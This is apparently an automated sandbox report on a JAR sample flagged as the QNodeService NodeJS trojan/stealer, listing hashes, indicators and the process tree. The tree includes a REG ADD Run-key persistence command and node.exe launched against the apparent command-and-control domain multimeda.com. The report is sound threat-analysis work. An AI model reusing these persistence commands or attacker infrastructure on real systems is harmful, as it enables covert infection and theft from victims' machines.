Analysis
-
max time kernel
118s -
max time network
127s -
platform
windows10_x64 -
resource
win10 -
submitted
05-10-2020 13:19
Static task
static1
Behavioral task
behavioral1
Sample
c7094e20cc91b7c901d6eb5e31960adb.jar
Resource
win7
Behavioral task
behavioral2
Sample
c7094e20cc91b7c901d6eb5e31960adb.jar
Resource
win10
General
-
Target
c7094e20cc91b7c901d6eb5e31960adb.jar
-
Size
166KB
-
MD5
c7094e20cc91b7c901d6eb5e31960adb
-
SHA1
90c51c785f4ce1e8c512a138f0f6ae0f91ea06e5
-
SHA256
a1ef033975e130591e2621fb7e7b2c1d8ddb2472220892017247ef541da8de77
-
SHA512
afbd1b6c0cc7d7ef062581a4390aac08b1b3612ba91a7dc0e46acc021ab1c8d8066e3e0fc1bec6932e5ed5a56ea0df2256999d88bd386a3519a157574e64c683
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 432 node.exe 2040 node.exe 652 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\673f7329-0c66-4cdc-b0b1-47776a921d06 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001adad-167.dat js behavioral2/files/0x000100000001adad-173.dat js behavioral2/files/0x000100000001adad-177.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 wtfismyip.com 16 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 432 node.exe 432 node.exe 432 node.exe 432 node.exe 2040 node.exe 2040 node.exe 2040 node.exe 2040 node.exe 652 node.exe 652 node.exe 652 node.exe 652 node.exe 652 node.exe 652 node.exe 652 node.exe 652 node.exe 652 node.exe 652 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1756 wrote to memory of 3436 1756 java.exe 76 PID 1756 wrote to memory of 3436 1756 java.exe 76 PID 3436 wrote to memory of 432 3436 javaw.exe 78 PID 3436 wrote to memory of 432 3436 javaw.exe 78 PID 432 wrote to memory of 2040 432 node.exe 80 PID 432 wrote to memory of 2040 432 node.exe 80 PID 2040 wrote to memory of 652 2040 node.exe 81 PID 2040 wrote to memory of 652 2040 node.exe 81 PID 652 wrote to memory of 1852 652 node.exe 83 PID 652 wrote to memory of 1852 652 node.exe 83 PID 1852 wrote to memory of 2656 1852 cmd.exe 84 PID 1852 wrote to memory of 2656 1852 cmd.exe 84
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\c7094e20cc91b7c901d6eb5e31960adb.jar1⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\c832e962.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain multimeda.com3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_HUjgGI\boot.js --hub-domain multimeda.com4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_HUjgGI\boot.js --hub-domain multimeda.com5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "673f7329-0c66-4cdc-b0b1-47776a921d06" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "673f7329-0c66-4cdc-b0b1-47776a921d06" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:2656
-
-
-
-
-
-